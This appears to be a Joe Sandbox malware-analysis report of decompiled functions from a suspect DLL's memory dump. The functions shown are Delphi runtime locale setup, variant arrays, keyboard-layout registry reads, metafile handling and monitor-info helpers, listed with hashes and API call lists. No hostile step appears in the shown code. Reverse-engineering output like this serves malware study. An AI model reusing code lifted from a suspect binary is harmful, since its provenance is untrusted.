                          • API String ID: 956096949-3772416878
                          • Opcode ID: 778c72b0bf0b56366e838813fde025b84cde207b933d0b9b3fe142ac1236387a
                          • Instruction ID: 1430288545a0765b8d52e3ce6c4598ac1792b96542a423cce81f020a8292e228
                          • Opcode Fuzzy Hash: 778c72b0bf0b56366e838813fde025b84cde207b933d0b9b3fe142ac1236387a
                          • Instruction Fuzzy Hash: 97118271504200EFCB51EFACC899A9B77E8BF49310F144668FD58DB286D779ED048B61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 72%
			/* Editorial reading, not a label from the report: Delphi RTL format-settings
			   initialisation (SysUtils GetFormatSettings / InitSysLocale). Every E0070B148 call below
			   wraps GetLocaleInfoA and its third argument is the LCTYPE; E0070B194 fetches a single
			   character with a default; E007083E8 is StrToIntDef; E007040BC assigns the result to a
			   global. The string IDs listed under Similarity ("m/d/yy", "mmmm d, yyyy", "AMPM",
			   ":mm", ":mm:ss") are that routine's built-in defaults. The SysUtils variable names in
			   the comments follow that reading. This runs at start-up in every Delphi binary, so the
			   locale queries here say nothing about the payload's own behaviour. */
			E0070CA64(void* __ebx, void* __edx, void* __edi, void* __esi) {
                          				char _v8;
                          				char _v12;
                          				char _v16;
                          				char _v20;
                          				char _v24;
                          				char _v28;
                          				char _v32;
                          				char _v36;
                          				char _v40;
                          				char _v44;
                          				char _v48;
                          				char _v52;
                          				char _v56;
                          				char _v60;
                          				char _v64;
                          				char _v68;
                          				void* _t104;
                          				void* _t111;
                          				void* _t133;
                          				intOrPtr _t183;
                          				intOrPtr _t193;
                          				intOrPtr _t194;
                          
                          				_t191 = __esi;
                          				_t190 = __edi;
                          				_t193 = _t194;
				_t133 = 8;
				do {     /* prologue: push 16 zero dwords, clearing the slots of the string locals _v8.._v68 */
					_push(0);
					_push(0);
					_t133 = _t133 - 1;
				} while (_t133 != 0);
                          				_push(__ebx);
                          				_push(_t193);
				_push(0x70cd2f);     /* Delphi try..finally frame: link a handler record into the SEH chain at fs:[0] */
				_push( *[fs:eax]);
				 *[fs:eax] = _t194;
                          				E0070C8F0();
                          				E0070B1F8(__ebx, __edi, __esi);
                          				_t196 =  *0x76f750;
                          				if( *0x76f750 != 0) {
                          					E0070B3D0(__esi, _t196);
                          				}
				_t132 = GetThreadLocale();
				E0070B148(_t43, 0, 0x14,  &_v20);                          /* 0x14 = LOCALE_SCURRENCY */
				E007040BC(0x76f684, _v20);                                 /* CurrencyString */
				E0070B148(_t43, 0x70cd44, 0x1b,  &_v24);                   /* 0x1b = LOCALE_ICURRENCY */
				 *0x76f688 = E007083E8(0x70cd44, 0, _t196);                /* CurrencyFormat */
				E0070B148(_t132, 0x70cd44, 0x1c,  &_v28);                  /* 0x1c = LOCALE_INEGCURR */
				 *0x76f689 = E007083E8(0x70cd44, 0, _t196);                /* NegCurrFormat */
				 *0x76f68a = E0070B194(_t132, 0x2c, 0xf);                  /* 0xf = LOCALE_STHOUSAND, default ',' (0x2c) */
				 *0x76f68b = E0070B194(_t132, 0x2e, 0xe);                  /* 0xe = LOCALE_SDECIMAL, default '.' (0x2e) */
				E0070B148(_t132, 0x70cd44, 0x19,  &_v32);                  /* 0x19 = LOCALE_ICURRDIGITS */
				 *0x76f68c = E007083E8(0x70cd44, 0, _t196);                /* CurrencyDecimals */
				 *0x76f68d = E0070B194(_t132, 0x2f, 0x1d);                 /* 0x1d = LOCALE_SDATE, default '/' (0x2f) */
				E0070B148(_t132, "m/d/yy", 0x1f,  &_v40);                  /* 0x1f = LOCALE_SSHORTDATE, default "m/d/yy" */
				E0070B480(_v40, _t132,  &_v36, _t190, _t191, _t196);       /* TranslateDateFormat */
				E007040BC(0x76f690, _v36);                                 /* ShortDateFormat */
				E0070B148(_t132, "mmmm d, yyyy", 0x20,  &_v48);            /* 0x20 = LOCALE_SLONGDATE, default "mmmm d, yyyy" */
				E0070B480(_v48, _t132,  &_v44, _t190, _t191, _t196);
				E007040BC(0x76f694, _v44);                                 /* LongDateFormat */
				 *0x76f698 = E0070B194(_t132, 0x3a, 0x1e);                 /* 0x1e = LOCALE_STIME, default ':' (0x3a) */
				E0070B148(_t132, 0x70cd78, 0x28,  &_v52);                  /* 0x28 = LOCALE_S1159 (AM designator) */
				E007040BC(0x76f69c, _v52);                                 /* TimeAMString */
				E0070B148(_t132, 0x70cd84, 0x29,  &_v56);                  /* 0x29 = LOCALE_S2359 (PM designator) */
				E007040BC(0x76f6a0, _v56);                                 /* TimePMString */
				E00704068( &_v12);                                         /* TimePrefix := '' */
				E00704068( &_v16);                                         /* TimePostfix := '' */
				E0070B148(_t132, 0x70cd44, 0x25,  &_v60);                  /* 0x25 = LOCALE_ITLZERO: leading zero on hours */
				_t104 = E007083E8(0x70cd44, 0, _t196);
				_t197 = _t104;
				if(_t104 != 0) {
					E00704100( &_v8, 0x70cd9c);                            /* HourFormat := 'hh' */
				} else {
					E00704100( &_v8, 0x70cd90);                            /* HourFormat := 'h' */
				}
				E0070B148(_t132, 0x70cd44, 0x23,  &_v64);                  /* 0x23 = LOCALE_ITIME: 0 = 12-hour clock */
				_t111 = E007083E8(0x70cd44, 0, _t197);
				_t198 = _t111;
				if(_t111 == 0) {
					E0070B148(_t132, 0x70cd44, 0x1005,  &_v68);            /* 0x1005 = LOCALE_ITIMEMARKPOSN: AM/PM before or after the time */
					if(E007083E8(0x70cd44, 0, _t198) != 0) {
						E00704100( &_v12, 0x70cdb8);                       /* TimePrefix := 'AMPM ' */
					} else {
						E00704100( &_v16, 0x70cda8);                       /* TimePostfix := ' AMPM' */
					}
				}
				_push(_v12);
				_push(_v8);
				_push(":mm");
				_push(_v16);
				E007043E8();                                               /* ShortTimeFormat := TimePrefix + HourFormat + ':mm' + TimePostfix */
				_push(_v12);
				_push(_v8);
				_push(":mm:ss");
				_push(_v16);
				E007043E8();                                               /* LongTimeFormat := TimePrefix + HourFormat + ':mm:ss' + TimePostfix */
				 *0x76f752 = E0070B194(_t132, 0x2c, 0xc);                  /* 0xc = LOCALE_SLIST, default ',' (ListSeparator) */
                          				_pop(_t183);
                          				 *[fs:eax] = _t183;
                          				_push(E0070CD36);
                          				return E0070408C( &_v68, 0x10);
                          			}
Line addresses (one entry per line of the C-code above, in order):
0x0070ca64 0x0070ca64 0x0070ca65 0x0070ca67 0x0070ca6c 0x0070ca6c 0x0070ca6e 0x0070ca70
0x0070ca70 0x0070ca73 0x0070ca76 0x0070ca77 0x0070ca7c 0x0070ca7f 0x0070ca82 0x0070ca87
0x0070ca8c 0x0070ca93 0x0070ca95 0x0070ca95 0x0070ca9f 0x0070caae 0x0070cabb 0x0070cad0
0x0070cadf 0x0070caf4 0x0070cb03 0x0070cb16 0x0070cb29 0x0070cb3e 0x0070cb4d 0x0070cb60
0x0070cb75 0x0070cb80 0x0070cb8d 0x0070cba2 0x0070cbad 0x0070cbba 0x0070cbcd 0x0070cbe2
0x0070cbef 0x0070cc04 0x0070cc11 0x0070cc19 0x0070cc21 0x0070cc36 0x0070cc40 0x0070cc45
0x0070cc47 0x0070cc60 0x0070cc49 0x0070cc51 0x0070cc51 0x0070cc75 0x0070cc7f 0x0070cc84
0x0070cc86 0x0070cc98 0x0070cca9 0x0070ccc2 0x0070ccab 0x0070ccb3 0x0070ccb3 0x0070cca9
0x0070ccc7 0x0070ccca 0x0070cccd 0x0070ccd2 0x0070ccdf 0x0070cce4 0x0070cce7 0x0070ccea
0x0070ccef 0x0070ccfc 0x0070cd0f 0x0070cd16 0x0070cd19 0x0070cd1c 0x0070cd2e

                          APIs
                          • GetThreadLocale.KERNEL32(00000000,0070CD2F,?,?,00000000,00000000), ref: 0070CA9A
                            • Part of subcall function 0070B148: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0070B166
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
• Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: Locale$InfoThread
                          • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                          • API String ID: 4232894706-2493093252
                          • Opcode ID: 92017bc436aa13b17552b40e400aa7c99a34a591242bc47fb6271d0e0ccf04db
                          • Instruction ID: 2454323ff398105528428c9f1f559afe930e69e2c899eff1e351f4773adb6e95
                          • Opcode Fuzzy Hash: 92017bc436aa13b17552b40e400aa7c99a34a591242bc47fb6271d0e0ccf04db
                          • Instruction Fuzzy Hash: 76618C70B00249DBDB01EBA4EC95A9E77E6DB88300F509779F201AB3D6DA7CDE058721
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 77%
			/* Editorial reading, not a label from the report: a variant-array helper from the
			   Delphi RTL's Variants support. __edx points at a VARIANT (TVarData) whose type word
			   must carry VT_ARRAY; if the element type masked with VT_TYPEMASK (0xfff) is not
			   VT_VARIANT (0xc) the value is handed to L0070D9A8 and the result checked by E0070EBF4,
			   which, given the E_INVALIDARG (0x80070057) call at the top, behaves like an
			   HRESULT-to-exception check. For a VT_VARIANT array the SAFEARRAY's leading cDims word
			   is read and a new VT_VARIANT SAFEARRAY with the same dimension count is created via
			   L0070DDFC (presumably SafeArrayCreate), stored into the result at __eax as
			   VT_ARRAY|VT_VARIANT (0x200c). The listing is cut off by the page before the element
			   copy loop, so what it does with the elements is not visible here. */
			E0070F04C(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
                          				char _v260;
                          				char _v768;
                          				char _v772;
                          				short* _v776;
                          				intOrPtr _v780;
                          				char _v784;
                          				signed int _v788;
                          				signed short* _v792;
                          				char _v796;
                          				char _v800;
                          				intOrPtr* _v804;
                          				void* __ebp;
                          				signed char _t47;
                          				signed int _t54;
                          				void* _t62;
                          				intOrPtr* _t73;
                          				intOrPtr* _t91;
                          				void* _t93;
                          				void* _t95;
                          				void* _t98;
                          				void* _t99;
                          				intOrPtr* _t108;
                          				void* _t112;
                          				intOrPtr _t113;
                          				char* _t114;
                          				void* _t115;
                          
                          				_t100 = __ecx;
                          				_v780 = __ecx;
                          				_t91 = __edx;
                          				_v776 = __eax;
				if(( *(__edx + 1) & 0x00000020) == 0) {     /* bit 0x20 of the high byte of vt = VT_ARRAY (0x2000); required here */
					E0070EBF4(0x80070057);     /* 0x80070057 = E_INVALIDARG */
				}
                          				_t47 =  *_t91;
                          				if((_t47 & 0x00000fff) != 0xc) {
                          					_push(_t91);
                          					_push(_v776);
                          					L0070D9A8();
                          					return E0070EBF4(_v776);
                          				} else {
                          					if((_t47 & 0x00000040) == 0) {
                          						_v792 =  *((intOrPtr*)(_t91 + 8));
                          					} else {
                          						_v792 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 8))));
                          					}
                          					_v788 =  *_v792 & 0x0000ffff;
                          					_t93 = _v788 - 1;
                          					if(_t93 < 0) {
                          						L9:
                          						_push( &_v772);
                          						_t54 = _v788;
                          						_push(_t54);
                          						_push(0xc);
                          						L0070DDFC();
                          						_t113 = _t54;
                          						if(_t113 == 0) {
                          							E0070E94C(_t100);
                          						}
                          						E0070EFA4(_v776);
                          						 *_v776 = 0x200c;
                          						 *((intOrPtr*)(_v776 + 8)) = _t113;
                          						_t95 = _v788 - 1;
                          						if(_t95 < 0) {
                          							L14:
                          							_t97 = _v788 - 1;
                          							if(E0070EFC0(_v788 - 1, _t115) != 0) {
                          								L0070DE14();
                          								E0070EBF4(_v792);
                          								L0070DE14();
                          								E0070EBF4( &_v260);
                          								_v780(_t113,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
                          							}
                          							_t62 = E0070EFF0(_t97, _t115);
                          						} else {
                          							_t98 = _t95 + 1;
                          							_t73 =  &_v768;
                          							_t108 =  &_v260;
                          							do {
                          								 *_t108 =  *_t73;
                          								_t108 = _t108 + 4;
                          								_t73 = _t73 + 8;
                          								_t98 = _t98 - 1;
                          							} while (_t98 != 0);
                          							do {
                          								goto L14;
                          							} while (_t62 != 0);
                          							return _t62;
                          						}
                          					} else {
                          						_t99 = _t93 + 1;
                          						_t112 = 0;
                          						_t114 =  &_v772;
                          						do {
                          							_v804 = _t114;
                          							_push(_v804 + 4);
                          							_t18 = _t112 + 1; // 0x1
                          							_push(_v792);
                          							L0070DE04();
                          							E0070EBF4(_v792);
                          							_push( &_v784);
                          							_t21 = _t112 + 1; // 0x1
                          							_push(_v792);
                          							L0070DE0C();
                          							E0070EBF4(_v792);
                          							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
                          							_t112 = _t112 + 1;
                          							_t114 = _t114 + 8;
                          							_t99 = _t99 - 1;
                          						} while (_t99 != 0);
                          						goto L9;
                          					}
                          				}
                          			}

                          APIs
                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0070F0E5
                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0070F101
                          • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0070F13A
                          • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0070F1B7
                          • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0070F1D0
                          • VariantCopy.OLEAUT32(?), ref: 0070F205
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                          • String ID:
                          • API String ID: 351091851-3916222277
                          • Opcode ID: 1776f6705603e5dd5b83fa5c3157d0e7522ba28b09e84c66c77e9e7b777ebabb
                          • Instruction ID: eed5266d82600531429d8077fb1af638d2d1b2f40fba9432a0bd9d300ac262fa
                          • Opcode Fuzzy Hash: 1776f6705603e5dd5b83fa5c3157d0e7522ba28b09e84c66c77e9e7b777ebabb
                          • Instruction Fuzzy Hash: C351FBB590062DDBCB22DB58CC85AD9B3FCAF4C300F0446E5E509E7242DA38AF858F61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 76%
                          			E0073666C(intOrPtr __eax, void* __ebx, void* __fp0) {
                          				intOrPtr _v8;
                          				int _v12;
                          				void* _v16;
                          				char _v20;
                          				void* _v24;
                          				struct HKL__* _v280;
                          				char _v536;
                          				char _v600;
                          				char _v604;
                          				char _v608;
                          				char _v612;
                          				void* _t60;
                          				intOrPtr _t106;
                          				intOrPtr _t111;
                          				void* _t117;
                          				void* _t118;
                          				intOrPtr _t119;
                          				void* _t129;
                          
                          				_t129 = __fp0;
                          				_t117 = _t118;
                          				_t119 = _t118 + 0xfffffda0;
                          				_v612 = 0;
                          				_v8 = __eax;
                          				_push(_t117);
                          				_push(0x736817);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t119;
                          				if( *((intOrPtr*)(_v8 + 0x34)) != 0) {
                          					L11:
                          					_pop(_t106);
                          					 *[fs:eax] = _t106;
                          					_push(0x73681e);
                          					return E00704068( &_v612);
                          				} else {
                          					 *((intOrPtr*)(_v8 + 0x34)) = E00703244(1);
                          					E00704068(_v8 + 0x38);
                          					_t60 = GetKeyboardLayoutList(0x40,  &_v280) - 1;
                          					if(_t60 < 0) {
                          						L10:
                          						 *((char*)( *((intOrPtr*)(_v8 + 0x34)) + 0x1d)) = 0;
                          						E00718DF8( *((intOrPtr*)(_v8 + 0x34)), 1);
                          						goto L11;
                          					} else {
                          						_v20 = _t60 + 1;
                          						_v24 =  &_v280;
                          						do {
                          							if(L00751A38( *_v24) == 0) {
                          								goto L9;
                          							} else {
                          								_v608 =  *_v24;
                          								_v604 = 0;
                          								if(RegOpenKeyExA(0x80000002, E00708FD0( &_v600,  &_v608, "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x", _t129, 0), 0, 0x20019,  &_v16) != 0) {
                          									goto L9;
                          								} else {
                          									_push(_t117);
                          									_push(0x7367d3);
                          									_push( *[fs:eax]);
                          									 *[fs:eax] = _t119;
                          									_v12 = 0x100;
                          									if(RegQueryValueExA(_v16, "layout text", 0, 0,  &_v536,  &_v12) == 0) {
                          										E007042D8( &_v612, 0x100,  &_v536);
                          										 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x34)))) + 0x3c))();
                          										if( *_v24 ==  *((intOrPtr*)(_v8 + 0x3c))) {
                          											E007042D8(_v8 + 0x38, 0x100,  &_v536);
                          										}
                          									}
                          									_pop(_t111);
                          									 *[fs:eax] = _t111;
                          									_push(0x7367da);
                          									return RegCloseKey(_v16);
                          								}
                          							}
                          							goto L12;
                          							L9:
                          							_v24 = _v24 + 4;
                          							_t38 =  &_v20;
                          							 *_t38 = _v20 - 1;
                          						} while ( *_t38 != 0);
                          						goto L10;
                          					}
                          				}
                          				L12:
                          			}

                          APIs
                          • GetKeyboardLayoutList.USER32(00000040,?,00000000,00736817,?,023F1458,?,00736879,00000000,?,00748E1B), ref: 007366C2
                          • RegOpenKeyExA.ADVAPI32(80000002,00000000), ref: 0073672A
                          • RegQueryValueExA.ADVAPI32(?,layout text,00000000,00000000,?,00000100,00000000,007367D3,?,80000002,00000000), ref: 00736764
                          • RegCloseKey.ADVAPI32(?,007367DA,00000000,?,00000100,00000000,007367D3,?,80000002,00000000), ref: 007367CD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: CloseKeyboardLayoutListOpenQueryValue
                          • String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text$|Qq
                          • API String ID: 1703357764-4010309709
                          • Opcode ID: b4591c82d9f99cac28d113d109f99980b564f7470c45cb47b12d21d290154925
                          • Instruction ID: f7f12eae70ea5f78122ab16b7b3f98b9f34e8cdb2f5248eef43da179f597d7a0
                          • Opcode Fuzzy Hash: b4591c82d9f99cac28d113d109f99980b564f7470c45cb47b12d21d290154925
                          • Instruction Fuzzy Hash: 5A414B75A00219EFEB10DF54C985BDEB7F9FF48304F9080A5E904A7692D778AE44CB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 94%
                          			E00723414(void* __eax, void* __ebx, int __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
                          				intOrPtr* _v8;
                          				int _v12;
                          				BYTE* _v16;
                          				intOrPtr _v18;
                          				signed int _v24;
                          				short _v26;
                          				short _v28;
                          				short _v30;
                          				short _v32;
                          				char _v38;
                          				struct tagMETAFILEPICT _v54;
                          				intOrPtr _v118;
                          				intOrPtr _v122;
                          				struct tagENHMETAHEADER _v154;
                          				intOrPtr _t103;
                          				intOrPtr _t115;
                          				struct HENHMETAFILE__* _t119;
                          				struct HENHMETAFILE__* _t120;
                          				void* _t122;
                          				void* _t123;
                          				void* _t124;
                          				void* _t125;
                          				intOrPtr _t126;
                          
                          				_t124 = _t125;
                          				_t126 = _t125 + 0xffffff68;
                          				_v12 = __ecx;
                          				_v8 = __edx;
                          				_t122 = __eax;
                          				E007232B0(__eax);
                          				 *((intOrPtr*)( *_v8 + 0xc))(__edi, __esi, __ebx, _t123);
                          				if(_v38 != 0x9ac6cdd7 || L00721EBC( &_v38) != _v18) {
                          					E0072106C();
                          				}
                          				_v12 = _v12 - 0x16;
                          				_v16 = E007026CC(_v12);
                          				_t103 =  *((intOrPtr*)(_t122 + 0x28));
                          				 *[fs:eax] = _t126;
                          				 *((intOrPtr*)( *_v8 + 0xc))( *[fs:eax], 0x723583, _t124);
                          				 *((short*)( *((intOrPtr*)(_t122 + 0x28)) + 0x18)) = _v24;
                          				if(_v24 == 0) {
                          					_v24 = 0x60;
                          				}
                          				 *((intOrPtr*)(_t103 + 0xc)) = MulDiv(_v28 - _v32, 0x9ec, _v24 & 0x0000ffff);
                          				 *((intOrPtr*)(_t103 + 0x10)) = MulDiv(_v26 - _v30, 0x9ec, _v24 & 0x0000ffff);
                          				_v54.mm = 8;
                          				_v54.xExt = 0;
                          				_v54.yExt = 0;
                          				_v54.hMF = 0;
                          				_t119 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
                          				 *(_t103 + 8) = _t119;
                          				if(_t119 == 0) {
                          					E0072106C();
                          				}
                          				GetEnhMetaFileHeader( *(_t103 + 8), 0x64,  &_v154);
                          				_v54.mm = 8;
                          				_v54.xExt = _v122;
                          				_v54.yExt = _v118;
                          				_v54.hMF = 0;
                          				DeleteEnhMetaFile( *(_t103 + 8));
                          				_t120 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
                          				 *(_t103 + 8) = _t120;
                          				if(_t120 == 0) {
                          					E0072106C();
                          				}
                          				 *((char*)(_t122 + 0x2c)) = 0;
                          				_pop(_t115);
                          				 *[fs:eax] = _t115;
                          				_push(0x72358a);
                          				return E007026EC(_v16);
                          			}

                          APIs
                          • MulDiv.KERNEL32(?,000009EC,00000000), ref: 007234B6
                          • MulDiv.KERNEL32(?,000009EC,00000000), ref: 007234D3
                          • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 007234FF
                          • GetEnhMetaFileHeader.GDI32(00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 0072351F
                          • DeleteEnhMetaFile.GDI32(00000016), ref: 00723540
                          • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC), ref: 00723553
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: FileMeta$Bits$DeleteHeader
                          • String ID: `
                          • API String ID: 1990453761-2679148245
                          • Opcode ID: c5ed2c64b6da05d276807a2143ad2929e9a478bf27f7acbbb7a2ee791c20c7b8
                          • Instruction ID: 753f274d0c216262ce9f4875ed2a96d85b35b2a9ea4f685173b283f1d6ee6f66
                          • Opcode Fuzzy Hash: c5ed2c64b6da05d276807a2143ad2929e9a478bf27f7acbbb7a2ee791c20c7b8
                          • Instruction Fuzzy Hash: BA413DB5E00218EFDB00DFA8D889AAEB7F9EF48710F108159F904E7241E7399E40CB64
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 67%
                          			E0071CAB8(void* __eax, void* __ebx, void* __edi, void* __esi) {
                          				char _v5;
                          				intOrPtr* _v12;
                          				long _v16;
                          				char _v20;
                          				char _v24;
                          				long _t22;
                          				char _t29;
                          				void* _t53;
                          				intOrPtr _t61;
                          				intOrPtr* _t62;
                          				intOrPtr _t63;
                          				intOrPtr _t66;
                          				intOrPtr _t67;
                          				void* _t72;
                          				void* _t73;
                          				intOrPtr _t74;
                          
                          				_t72 = _t73;
                          				_t74 = _t73 + 0xffffffec;
                          				_push(__esi);
                          				_push(__edi);
                          				_t53 = __eax;
                          				_t22 = GetCurrentThreadId();
                          				_t62 =  *0x76e314; // 0x76f034
                          				if(_t22 !=  *_t62) {
                          					_v24 = GetCurrentThreadId();
                          					_v20 = 0;
                          					_t61 =  *0x76e130; // 0x713cc8
                          					L0070B9FC(_t53, _t61, 1, __edi, __esi, 0,  &_v24);
                          					L00703A00();
                          				}
                          				if(_t53 <= 0) {
                          					E0071CA90();
                          				} else {
                          					E0071CA9C(_t53);
                          				}
                          				_v16 = 0;
                          				_push(0x76f870);
                          				L00706368();
                          				_push(_t72);
                          				_push(0x71cc46);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t74;
                          				_v16 = InterlockedExchange(0x76c404, _v16);
                          				_push(_t72);
                          				_push(0x71cc27);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t74;
                          				if(_v16 == 0 ||  *((intOrPtr*)(_v16 + 8)) <= 0) {
                          					_t29 = 0;
                          				} else {
                          					_t29 = 1;
                          				}
                          				_v5 = _t29;
                          				if(_v5 == 0) {
                          					L15:
                          					_pop(_t63);
                          					 *[fs:eax] = _t63;
                          					_push(E0071CC2E);
                          					return E00703274(_v16);
                          				} else {
                          					if( *((intOrPtr*)(_v16 + 8)) > 0) {
                          						_v12 = E0071707C(_v16, 0);
                          						E00716F6C(_v16, 0);
                          						L007064A8();
                          						 *[fs:eax] = _t74;
                          						 *[fs:eax] = _t74;
                          						 *((intOrPtr*)( *_v12 + 8))( *[fs:eax], _t72,  *[fs:eax], 0x71cbf1, _t72, 0x76f870);
                          						_pop(_t66);
                          						 *[fs:eax] = _t66;
                          						_t67 = 0x71cbc2;
                          						 *[fs:eax] = _t67;
                          						_push(E0071CBF8);
                          						_push(0x76f870);
                          						L00706368();
                          						return 0;
                          					} else {
                          						goto L15;
                          					}
                          				}
                          			}

                          APIs
                          • GetCurrentThreadId.KERNEL32 ref: 0071CAC3
                          • GetCurrentThreadId.KERNEL32 ref: 0071CAD2
                            • Part of subcall function 0071CA90: ResetEvent.KERNEL32(000001A4,0071CB0D), ref: 0071CA96
                          • RtlEnterCriticalSection.KERNEL32(0076F870), ref: 0071CB17
                          • InterlockedExchange.KERNEL32(0076C404,?), ref: 0071CB33
                          • RtlLeaveCriticalSection.KERNEL32(0076F870,00000000,0071CC27,?,00000000,0071CC46,?,0076F870), ref: 0071CB8C
                          • RtlEnterCriticalSection.KERNEL32(0076F870,0071CBF8,0071CC27,?,00000000,0071CC46,?,0076F870), ref: 0071CBEB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: CriticalSection$CurrentEnterThread$EventExchangeInterlockedLeaveReset
                          • String ID: LXq
                          • API String ID: 2189153385-3550559040
                          • Opcode ID: 4e50c93e36406ec7adfc929aa4550b6fceb055f2dad30197eca802ea83b1c6ed
                          • Instruction ID: 2e4eb0fc6b0fc0f3e6a18f2229f5afd473e0c7061dac18ddddd1077c22b599f2
                          • Opcode Fuzzy Hash: 4e50c93e36406ec7adfc929aa4550b6fceb055f2dad30197eca802ea83b1c6ed
                          • Instruction Fuzzy Hash: 5831DFB0A88344EFD712DFA8D856AADBBF8EB09700F5184A0F801D72D1D73D9D90CA61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 67%
                          			E007272A0(struct HMONITOR__* _a4, struct tagMONITORINFO* _a8) {
                          				void _v20;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				void* __ebp;
                          				void* _t23;
                          				int _t24;
                          				struct HMONITOR__* _t27;
                          				struct tagMONITORINFO* _t29;
                          				intOrPtr* _t31;
                          
                          				_t29 = _a8;
                          				_t27 = _a4;
                          				if( *0x76f920 != 0) {
                          					_t24 = 0;
                          					if(_t27 == 0x12340042 && _t29 != 0 && _t29->cbSize >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
                          						_t29->rcMonitor.left = 0;
                          						_t29->rcMonitor.top = 0;
                          						_t29->rcMonitor.right = GetSystemMetrics(0);
                          						_t29->rcMonitor.bottom = GetSystemMetrics(1);
                          						asm("movsd");
                          						asm("movsd");
                          						asm("movsd");
                          						asm("movsd");
                          						_t31 = _t29;
                          						 *(_t31 + 0x24) = 1;
                          						if( *_t31 >= 0x4c) {
                          							_push("DISPLAY");
                          							_push(_t31 + 0x28);
                          							L00706548();
                          						}
                          						_t24 = 1;
                          					}
                          				} else {
                          					 *0x76f904 = E00726F70(4, _t23,  *0x76f904, _t27, _t29);
                          					_t24 = GetMonitorInfoA(_t27, _t29);
                          				}
                          				return _t24;
                          			}

                          APIs
                          • GetMonitorInfoA.USER32(?,?), ref: 007272D1
                          • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 007272F8
                          • GetSystemMetrics.USER32 ref: 0072730D
                          • GetSystemMetrics.USER32 ref: 00727318
                          • lstrcpy.KERNEL32(?,DISPLAY), ref: 00727342
